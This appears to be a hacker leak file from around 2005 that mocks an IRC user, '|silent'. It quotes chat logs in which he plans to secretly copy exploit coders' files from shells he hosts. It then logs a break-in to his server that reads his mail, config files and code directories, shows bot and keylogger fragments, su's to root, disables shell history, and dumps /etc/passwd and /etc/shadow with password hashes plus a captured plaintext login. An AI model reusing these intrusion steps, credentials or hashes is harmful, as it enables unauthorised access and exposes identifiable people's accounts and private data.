---------------------------------------------------------------------------- fmrj@exedius fmrj $ cat h0no.txt | grep \|silent :d4rkgr3y!~phear@217.107.223.43 PRIVMSG FoxTrot- : |silent is m00 member ---------------------------------------------------------------------------- 18:53 <|silent> btw! there is a group outta there who own boxes from security-team-ppl 18:53 <|silent> 2 m00 ppl already got owned and one teso guy got owned 18:53 <|silent> i know all the 3 ppl! 18:54 <|silent> i'm a bit scared they seem to be good i just hope they wont take my server :/ <-------- (greyhat.co.uk , oral-sex.bz , digitaljunk.de) 18:54 <|silent> check http://h0h0.com/h0no.txt 18:54 <|silent> search for silent in the document 18:55 heh, nice :P 18:55 they wont manage it :P <---------- 18:55 ill read it, i just fix the mail stuff first 18:57 <|silent> okay :) 19:00 seems to work ;) 19:00 <|silent> :D 19:01 hmmm 19:01 which box is that ? 19:01 drwx------ 2 rob rob 512 Sep 19 19:06 rob 19:01 drwx------ 2 silent silent 512 Sep 20 06:16 silent 19:02 <|silent> it was the box from a m00 teammate 19:02 ok :P 19:02 <|silent> from a fucking good security guy also! so i'm a bit scared ;/ <------- 19:03 <|silent> http://reflux.dyndns.org/ 19:03 lol, they write like fucking script-kiddies :P 19:03 ok 19:03 <|silent> lol 19:03 if they manage to get your root password it is no problem to root it 19:03 else it's HARD 19:03 i don't think they will manage to do so <-------------- 19:04 since you use random return addresses 19:04 most exploits require a pre-defined return address to occour to work 19:04 <|silent> yea but.. they don't use bruteforce shit.. as the hono file say ;/ 19:04 atleast overflow exploits 19:04 <|silent> they use useraccounts and gain root with it 15:01 <|silent_> a question... 15:01 <|silent_> is it right that emails stay in queue some days if server is offline? 15:02 <|silent_> and 2. question ;P can you install grsec? and remove suid progs as long as they aren't needed? 15:04 <|silent_> cuz as you know (i guess) i'm member of m00-antisecurity and priv8 hehe and i want to give the coder shells for free :D <------------- 15:05 <|silent_> so they put some private stuff on it and i add a daemon which copy all files from users homedir if there are new files incoming :D <---------- 15:05 <|silent_> so i get all the exploits :) <--------------- 15:09 yes 15:09 i can install grsec 15:09 and remove uneccecssarry suids 15:10 nice ;) 15:10 do that 15:10 i'll help you to secure it 20:20 but remember i'll add m00 and priv8 ppl <--------- 20:20 then we'll degrade 20:20 grrr 20:20 fuck :P 20:20 hahaha :D 20:20 i add all the coder :D 20:20 hahaha :P 20:20 so we can take their sources and advisories :D <---------------- 20:20 you've talked to them ? 20:20 yep 20:20 yep :P 20:21 i announced in m00 members page that i'll got a server for the coders :) 20:21 then we root fbi.gov <--- lol keep dreaming. 20:21 hahaha 20:21 not from my server :D 20:21 i will :P 20:21 but we have to think about something which copy all new downloaded files to a special folder ;D <-------------- 20:22 so that we can get it later :p <--------------- 20:22 and we have to manipulate w and who so that ppl just see their own processes 20:22 ehrm 20:22 own connections --------------------------------------------------------------------------------------------------------------------------- *QOUTE* "18:55 they wont manage it :P" *QOUTE* digitaljunk:~$ uname -a; id Linux digitaljunk 2.6.11.9-grsec-digitaljunk #2 Tue May 31 19:42:12 CEST 2005 i686 GNU/Linux uid=1000(silent) gid=100(users) Gruppen=100(users) digitaljunk:~$ ls coding htdocs logs Maildir psybnc upload V8-Chainsaw.wmv digitaljunk:~$ cd Maildir/ digitaljunk:~/Maildir$ cd new/ digitaljunk:~/Maildir/new$ ls 1117646738.V302I40e226M724551.localhost.localdomain 1117675319.V302I40e24eM969104.localhost.localdomain 1117762454.V302I40e29eM992998.localhost.localdomain 1117897564.V302I40e2b7M732798.localhost.localdomain 1117650803.V302I40e229M467122.localhost.localdomain 1117676356.V302I40e24fM100457.localhost.localdomain 1117768511.V302I40e29fM290776.localhost.localdomain 1117915062.V302I40e2bbM630625.localhost.localdomain 1117652859.V302I40e22aM436279.localhost.localdomain 1117712986.V302I40e25dM30075.localhost.localdomain 1117818555.V302I40e29dM724750.localhost.localdomain 1117917780.V302I40e2bcM235205.localhost.localdomain 1117655721.V302I40e238M3168.localhost.localdomain 1117719477.V302I40e25eM347674.localhost.localdomain 1117848836.V302I40e239M381375.localhost.localdomain 1117935215.V302I40e2c0M49289.localhost.localdomain 1117664262.V302I40e24cM577076.localhost.localdomain 1117720174.V302I40e25fM586414.localhost.localdomain 1117872587.V302I40e2b6M182787.localhost.localdomain 1117962158.V302I40e2c1M125556.localhost.localdomain 1117670079.V302I40e24dM301950.localhost.localdomain 1117740176.V302I40e29aM916861.localhost.localdomain 1117895970.V302I40e2b9M539557.localhost.localdomain digitaljunk:~/Maildir/new$ cat 1117646738.V302I40e226M724551.localhost.localdomain Return-Path: X-Original-To: silent@oral-sex.bz Delivered-To: silent@oral-sex.bz Received: from dd1826.kasserver.com (dd1826.kasserver.com [81.209.148.73]) by mail.digitaljunk.de (Postfix) with ESMTP id A36241AF2EE for ; Wed, 1 Jun 2005 19:25:38 +0200 (CEST) Received: by dd1826.kasserver.com (Postfix, from userid 30) id 65358735BA; Tue, 31 May 2005 14:11:06 +0200 (CEST) To: silent@oral-sex.bz Subject: Team Gesus From: homeless@sex.com Message-Id: <20050531121106.65358735BA@dd1826.kasserver.com> Date: Tue, 31 May 2005 14:11:06 +0200 (CEST) Someone logged in! User: Ch4oS Pass: ubpdntv9 digitaljunk:~/Maildir/new$ ls 1117646738.V302I40e226M724551.localhost.localdomain 1117675319.V302I40e24eM969104.localhost.localdomain 1117762454.V302I40e29eM992998.localhost.localdomain 1117897564.V302I40e2b7M732798.localhost.localdomain 1117650803.V302I40e229M467122.localhost.localdomain 1117676356.V302I40e24fM100457.localhost.localdomain 1117768511.V302I40e29fM290776.localhost.localdomain 1117915062.V302I40e2bbM630625.localhost.localdomain 1117652859.V302I40e22aM436279.localhost.localdomain 1117712986.V302I40e25dM30075.localhost.localdomain 1117818555.V302I40e29dM724750.localhost.localdomain 1117917780.V302I40e2bcM235205.localhost.localdomain 1117655721.V302I40e238M3168.localhost.localdomain 1117719477.V302I40e25eM347674.localhost.localdomain 1117848836.V302I40e239M381375.localhost.localdomain 1117935215.V302I40e2c0M49289.localhost.localdomain 1117664262.V302I40e24cM577076.localhost.localdomain 1117720174.V302I40e25fM586414.localhost.localdomain 1117872587.V302I40e2b6M182787.localhost.localdomain 1117962158.V302I40e2c1M125556.localhost.localdomain 1117670079.V302I40e24dM301950.localhost.localdomain 1117740176.V302I40e29aM916861.localhost.localdomain 1117895970.V302I40e2b9M539557.localhost.localdomain digitaljunk:~/Maildir/new$ cat 1117650803.V302I40e229M467122.localhost.localdomain Return-Path: X-Original-To: silent@oral-sex.bz Delivered-To: silent@oral-sex.bz Received: from ns30617.ovh.net (ns30617.ovh.net [213.186.47.153]) by mail.digitaljunk.de (Postfix) with SMTP id 508F11AF2EE for ; Wed, 1 Jun 2005 20:33:23 +0200 (CEST) Received: (qmail 24578 invoked by uid 99); 31 May 2005 09:32:46 -0000 Date: 31 May 2005 09:32:46 -0000 Message-ID: <20050531093246.7663.qmail@ns30617.ovh.net> To: silent@oral-sex.bz Subject: [Exploits] Microsoft Windows Exploit (MS05-012), Zeroboard 4.x "preg_replace" Exploit From: FrSIRT Alerts X-Sender: Mime-Version: 1.0 charset=ISO-8859-1 Content-Transfer-Encoding: 7bit ---------------------------------------------------------------------- FrSIRT / Exploits and Codes ---------------------------------------------------------------------- The French Security Incident Response Team 24/24 & 7/7 ---------------------------------------------------------------------- - 31 May 2005 - ---------------------------------------------------------------------- - Microsoft Windows COM Structured Storage Local Exploit (MS05-012) http://www.frsirt.com/exploits/20050531.SSExploit.c.php - Zeroboard 4.x "preg_replace" Remote Command Execution Exploit http://www.frsirt.com/exploits/20050531.zeroboard.c.php ---------------------------------------------------------------------- Copyright © 2002-2005 - FrSIRT.COM ---------------------------------------------------------------------- digitaljunk:~/Maildir/new$ cd digitaljunk:~$ pwd /home/silent digitaljunk:~$ ls coding htdocs logs Maildir psybnc upload V8-Chainsaw.wmv digitaljunk:~$ cd psybnc/ digitaljunk:~/psybnc$ ls CHANGES config.h COPYING FAQ help key lang log Makefile makefile.out makesalt menuconf motd psybnc psybncchk psybnc.conf psybnc.conf.old psybnc.pid README SCRIPTING scripts src targets.mak TODO tools digitaljunk:~/psybnc$ cat psybnc.conf PSYBNC.SYSTEM.PORT1=9000 PSYBNC.SYSTEM.HOST1=* PSYBNC.HOSTALLOWS.ENTRY0=*;* USER1.USER.LOGIN=silent USER1.USER.USER=We can't stop here! It's batcountry! USER1.USER.PASS==0d`=`q0E`f'P'k`p`Z USER1.USER.RIGHTS=1 USER1.USER.VLINK=0 USER1.USER.PPORT=0 USER1.USER.PARENT=0 USER1.USER.QUITTED=0 USER1.USER.DCCENABLED=1 USER1.USER.AUTOGETDCC=0 USER1.USER.AIDLE=0 USER1.USER.LEAVEQUIT=0 USER1.USER.AUTOREJOIN=1 USER1.USER.SYSMSG=1 USER1.USER.LASTLOG=0 USER1.USER.CERT=+ USER1.USER.NICK=|silent USER1.SERVERS.SERVER1=irc.inet.tele.dk USER1.SERVERS.PORT1=6668 USER1.CHANNELS.ENTRY1=#heppy_quaxx USER1.CHANNELS.ENTRY2=#se USER1.CHANNELS.ENTRY3=#blackhats USER1.CHANNELS.ENTRY0=#netcafe USER2.USER.LOGIN=silent USER2.USER.USER=We can't stop here! It's batcountry! USER2.USER.PASS==0d`=`q0E`f'P'k`p`Z USER2.USER.NETWORK=B USER2.USER.RIGHTS=1 USER2.USER.VLINK=0 USER2.USER.PPORT=0 USER2.USER.PARENT=1 USER2.USER.QUITTED=0 USER2.USER.DCCENABLED=0 USER2.USER.AUTOGETDCC=0 USER2.USER.AIDLE=0 USER2.USER.LEAVEQUIT=0 USER2.USER.AUTOREJOIN=0 USER2.USER.SYSMSG=0 USER2.USER.LASTLOG=0 USER2.USER.CERT=+ USER2.USER.NICK=|silent USER2.SERVERS.SERVER1=S=irc.blackhat.ru USER2.SERVERS.PORT1=6697 USER2.CHANNELS.ENTRY0=#m00 digitaljunk:~/psybnc$ cd .. digitaljunk:~$ ls coding htdocs logs Maildir psybnc upload V8-Chainsaw.wmv digitaljunk:~$ cd coding/ digitaljunk:~/coding$ ls cokebot dev-files done php samples digitaljunk:~/coding$ ls * cokebot: bf_tab.h blowfish.c blowfish.h cocain cokebot.c Makefile dev-files: blowfish-dev mysql-dev done: kaiten.c keyloger.c libirc.tar.gz uingen.c php: bleattern.php getfiletime.php nospam.php random_pass.php upload.php urlvalid.php validate_mail.php samples: fopen.c itoa.c readdir.c socket-client.c socket-server.c unlink.c digitaljunk:~/coding$ cd cokebot digitaljunk:~/coding/cokebot$ cat cokebot.c /* ****** PRIVATE EDITION ****** * * * cokebot v.0.5 beta * * © 2004 by |silent * * * ***************************** Changelog: 08.11.2004 + added reconnect feature! Changelog: 03.11.2004 + added part command + added restart command (beta! too lazy to fork() ;D will do it soon!) Changelog: 02.11.2004 + added static login (eh? missing part cmd see TODO) + added chanlist (beta! chan/chankey support done!) + added userlist support + replaced join/op/deop/die/whoami commands for user-support + added userlist with authlevel + added support for older gcc Changelog: 01.11.2004 + rewrote command system + radnom nick/user/ident + updated conn() + added nick system (completation etc..) + blowfish cryption (beta) + segfault on quit fixed + fixed segfault on non-existing sites.conf Changelog: 31.10.2004 + radnom nick/user/ident + replaced sendtotarget() + static server/port + added commandlist by char TODO: - use linked lists for chans - restart fork() - better blowfish implementation - doconf() to create conf-files if non exist - crypted userlist - crypted chanlist - add modes etc.. to chanlist - sitemanager - admin control to modify chans/user - useradd - evilmode - hidden process - shellcommands */ digitaljunk:~/coding/cokebot$ cd .. digitaljunk:~/coding$ ls cokebot dev-files done php samples digitaljunk:~/coding$ cd done/ digitaljunk:~/coding/done$ ls kaiten.c keyloger.c libirc.tar.gz uingen.c digitaljunk:~/coding/done$ cat kaiten.c //////////////////////////////////////////////////////////////////////////////// // EDIT THESE // //////////////////////////////////////////////////////////////////////////////// #undef STARTUP // Start on startup? #undef IDENT // Only enable this if you absolutely have to #define FAKENAME "-bash" // What you want this to hide as #define CHAN "#stormx" // Channel to join #define KEY "sex" // The key of the channel int numservers=3; // Must change this to equal number of servers down there char *servers[] = { // List the servers in that format, always end in (void*)0 "irc.inet.tele.dk", "irc.efnet.nl", "irc.isdnet.fr", (void*)0 }; //////////////////////////////////////////////////////////////////////////////// // STOP HERE! // //////////////////////////////////////////////////////////////////////////////// digitaljunk:~/coding/done$ cat keyloger.c /* Simple Keyloger - by |silent */ #include #include #include digitaljunk:~/coding/done$ cat uingen.c #include #include void welcome() { printf("[-] UINGen by |silent\n"); printf("[-] (c) 2004 |silent\n"); printf("[-] Contact: silent@oral-sex.bz\n"); printf("[-] Website: http://blackhat.tv\n"); } void usage() { printf("[-] Usage: ./uingen -f -l [-po]\n"); printf("[-] Scan-Example: ./uingen -f 500000 -l 550000 -p test123 -o uinlist.txt\n"); printf("[-] Single-UIN Example: ./uingen -s 123123123 -w word.lst -o brutelist.txt\n"); printf("[-] -f First UIN\n"); printf("[-] -l Last UIN\n"); printf("[-] -s Single UIN/Wordlist Mode [-w required]\n"); printf("[-] -w Wordlist [for single UIN mode only]\n"); printf("[-] -p Password [default: password]\n"); printf("[-] -o Outfile [default: outfile.txt]\n"); exit(1); } digitaljunk:~/coding$ cd samples/ digitaljunk:~/coding/samples$ ls fopen.c itoa.c readdir.c socket-client.c socket-server.c unlink.c digitaljunk:~/coding/samples$ cd Where are those codes...... digitaljunk:~$ cd htdocs/ digitaljunk:~/htdocs$ ls 213.239.211.98 digitaljunk.de greyhat.co.uk oral-sex.bz digitaljunk:~/htdocs$ cd digitaljunk.de/ digitaljunk:~/htdocs/digitaljunk.de$ ls 1211040546_G.jpg awstats.greyhat.co.uk.conf configure.txt di.tgz google inc P1010103.JPG route Sorgenkint_-_Swingerclub_E.P.rar thumb.php view.php 303.MPG base64.jpg content DJ_Man_at_Arms_-_Acidkiller.rar image index.php priv8.php sambuca.gif stats tor3.b64 www amphe.jpg CIMG0311.JPG css gallery.php images P1010095.JPG priv8v.php shoutbox.php test.php tor3.jpg digitaljunk:~/htdocs/digitaljunk.de$ cd content/ digitaljunk:~/htdocs/digitaljunk.de/content$ ls coding config pixx priv8 smile snippets sources vidz www.technoharmony.de digitaljunk:~/htdocs/digitaljunk.de/content$ ls * coding: exploits snippets sources config: bitchxrc config giftd.conf ipfw.conf menu.xml ports-supfile vimrc vsftpd.conf zshenv pixx: Auesee bday Ebba Flunkyball Friends Hanna Joerdis KSS-NRW p_old Saufabend Wolfskuhlen priv8: friday mobile smile: 19.gif augen.jpg brav.gif cry.gif fliege.gif kaoz.gif love-smiley-087.gif narren.gif p.gif roll.gif top.gif 1party43.gif avatar.gif buch.gif dance.gif fly2.gif knuddel.gif mad.gif naughty.gif pil.gif sam55mC.jpg toptop.gif 789a.gif avatar_isa.jpg caught.gif dude.gif (.gif krank.gif matrix2-1.gif newwer.gif popcorn.gif schaf_2.gif typ1.jpg 8).gif bigredsmiley.gif cheer_icoon.gif erschiess.gif hello.gif lam.gif mixed-smiley-043.gif o.gif poppen.gif smilysun.gif weird.gif alki.gif blink.gif confused-smiley-013.gif evil.gif heureka.gif liebe_62.gif motz2.gif omg.gif puke.gif spiralnebel.gif anbet.gif bluegrab.gif coolsmoke.gif f19d884c6e6140c1aaea812bc8e8fa60.jpg huepfen.gif lol.gif muh_schild.png party_4.gif question.gif stupid.gif angel.gif bong.gif cow.gif fatal-elias1.png imwithstupid.gif lollol.gif musik.gif peace2.gif roflmao.gif tits.gif snippets: sources: axis-0wner.c bot.pl cleanup_braindb.tcl freshmeat.tcl heise.tcl http.tcl ipv6-up.sh md5crypt.pl proxy.c rosec-sniff.c si.c symantec.tcl zone-h.tcl banner.c brain.tcl computerworld.tcl fuckhost3.c hell.c imdb.tcl itoa.h ntpdump.c pscan.c secnet-nossl.pl slashdot.tcl uroot.c bd-src.c bugtraq.tcl evilshell.c google.tcl hellcode.c ipgen.c kaiten.c onlinekosten.tcl reppid.c securitynews.tcl spiegel.tcl worm.cpp bind.c ChanPeak1.3ger.tcl execget.c hc.c httpgrab.c ipv6.c massmailer.c phpexpl.c requestips.sh security.tcl ssn.tcl zdnet.tcl vidz: afterhour-part1.avi silent_owned.wmv www.technoharmony.de: special digitaljunk:~/htdocs/digitaljunk.de/content$ cd coding/exploits/ digitaljunk:~/htdocs/digitaljunk.de/content/coding/exploits$ ls axis-0wner.c die_putze.0.6.tar.gz kit.tgz.tar m00-samba-pwnd.tar.bz2 mirc-6.14.c phpbb.tar.gz seXFree.c sol-dtscd.tar.gz st.tgz sunroot.tar bmon.c ES-PsyJack.tar m00-0Wn-0x333.c m00-smtpclame.c msqlfast.c proftpd1.2.7-9_mass_m00.c skinhead.tgz spypipe.c sudo-exploit.c tlswrap0.7.tar.gz bot.rar fakepsy.c m00-omfg-HL-again.c map.rar nkit6.tar raq4-scan.zip SK.rar sqlhello.zip sudos.c UHAGr-jidentd-exploit.tar.gz BINGO! digitaljunk:~/htdocs/digitaljunk.de/content/coding/exploits$ cd .. digitaljunk:~/htdocs/digitaljunk.de/content/coding$ ls exploits snippets sources digitaljunk:~/htdocs/digitaljunk.de/content/coding$ ls sources/ agobot3-0.2.1-pre4-priv.rar blow BlowSXT.rar connectback.pl hookbot.tgz kaiten.c libirc.tar.gz mysql pftp-src.0.11.4.tgz shijack.c sock.c uingen.c digitaljunk:~$ su root Password: digitaljunk:/home/silent# export HISTFILE=/dev/null digitaljunk:/home/silent# id uid=0(root) gid=0(root) Gruppen=0(root) digitaljunk:/home/silent# cd digitaljunk:~# ls allsql.sql candicrew_home.tgz cyrus-imapd-2.2.12.tar.gz db-4.3.28 ebba_home.tgz oidentd-2.0.7 pam_mysql-0.5.tar.gz procmail-3.22 video.asp?video=V8-Chainsaw awstats-6.5.tar.gz cybersoft_inkasso_home.tgz cyrus-sasl-2.1.21 db-4.3.28.tar.gz install-report.template oidentd-2.0.7.tar.gz postfix-2.1.6 procmail-3.22.tar.gz waterguide_home.tgz awstats-6.5.tar.gz.1 cyrus-imapd-2.2.12 cyrus-sasl-2.1.21.tar.gz dbootstrap_settings Mail pam_mysql postfix-2.1.6.tar.gz vhosts.conf.backup webmin-1.200.tar.gz digitaljunk:/home/silent# cd digitaljunk:~# ls allsql.sql candicrew_home.tgz cyrus-imapd-2.2.12.tar.gz db-4.3.28 ebba_home.tgz oidentd-2.0.7 pam_mysql-0.5.tar.gz procmail-3.22 video.asp?video=V8-Chainsaw awstats-6.5.tar.gz cybersoft_inkasso_home.tgz cyrus-sasl-2.1.21 db-4.3.28.tar.gz install-report.template oidentd-2.0.7.tar.gz postfix-2.1.6 procmail-3.22.tar.gz waterguide_home.tgz awstats-6.5.tar.gz.1 cyrus-imapd-2.2.12 cyrus-sasl-2.1.21.tar.gz dbootstrap_settings Mail pam_mysql postfix-2.1.6.tar.gz vhosts.conf.backup webmin-1.200.tar.gz digitaljunk:~# cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh Debian-exim:x:102:102::/var/spool/exim4:/bin/false sshd:x:100:65534::/var/run/sshd:/bin/false mysql:x:101:104:MySQL Server,,,:/var/lib/mysql:/bin/false silent:x:1000:100::/home/silent: breath:x:1001:100::/home/breath: upload:x:1002:100::/home/silent/upload:/bin/false stigma:x:1003:100::/home/stigma:/bin/bash hillside:x:1004:100::/home/hillside:/bin/bash bind:x:103:105::/var/cache/bind:/bin/false tuborg:x:1005:100::/home/tuborg: cyrus:x:1006:8::/usr/cyrus: postfix:x:33333:33333::/dev/null:/bin/false dovecot:x:106:106:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false tech:x:1007:1007:,,,:/home/tech:/bin/bash marius:x:33334:100:Mail User:/home/mailusers/marius:/bin/false jonas:x:33335:100:Mail user:/home/mailusers/jonas:/bin/false bjerkis:x:33336:100:Mail user:/home/mailusers/bjerkis:/bin/false digitaljunk:~# cat /etc/shadow root:$1$T6gE9w0/$vo/dIs7jK7CP2lr.aRtMx/:12934:0:99999:7::: daemon:*:12893:0:99999:7::: bin:*:12893:0:99999:7::: sys:*:12893:0:99999:7::: sync:*:12893:0:99999:7::: games:*:12893:0:99999:7::: man:*:12893:0:99999:7::: lp:*:12893:0:99999:7::: mail:*:12893:0:99999:7::: news:*:12893:0:99999:7::: uucp:*:12893:0:99999:7::: proxy:*:12893:0:99999:7::: www-data:*:12893:0:99999:7::: backup:*:12893:0:99999:7::: list:*:12893:0:99999:7::: irc:*:12893:0:99999:7::: gnats:*:12893:0:99999:7::: nobody:*:12893:0:99999:7::: Debian-exim:!:12893:0:99999:7::: sshd:!:12893:0:99999:7::: mysql:!:12893:0:99999:7::: silent:$1$72YyIyox$67vyj7jfLUWeFYA24dWOl1:12934:0:99999:7::: breath:!:12934:0:99999:7::: upload:$1$gVq9vOrJ$qrQgeXNVHjX.FFi4xhK9K/:12934:0:99999:7::: stigma:$1$tXmQAvtL$aW5h.0m/oIqzClFRK2Qh..:12934:0:99999:7::: hillside:$1$gfXquKfq$mWkMvMvKY3sck.PJstZqp0:12934:0:99999:7::: bind:!:12934:0:99999:7::: tuborg:$1$lhO4VKnt$yx9/34El7HK5m5KS5jUFe/:12934:0:99999:7::: cyrus:$1$mk7JsS6t$/lGzf9WhyOT9ZdotH.ajN.:12934:0:99999:7::: postfix:!:12934:0:99999:7::: dovecot:!:12935:0:99999:7::: tech:$1$SYf8xzC/$enjJt2k9hqxdxiUogdD3D/:12935:0:99999:7::: marius:$1$mtWc/oSj$czow9rYQcy3EPrtRfTQHX0:12935:0:99999:7::: jonas:$1$i9wTlJ7r$4TbucpQL.uG6RmDgkq9uP.:12936:0:99999:7::: bjerkis:$1$Z8TcITtK$KvOghtp2AYJCQLogkHovh1:12936:0:99999:7::: *QOUTE* "18:55 they wont manage it :P" *QOUTE*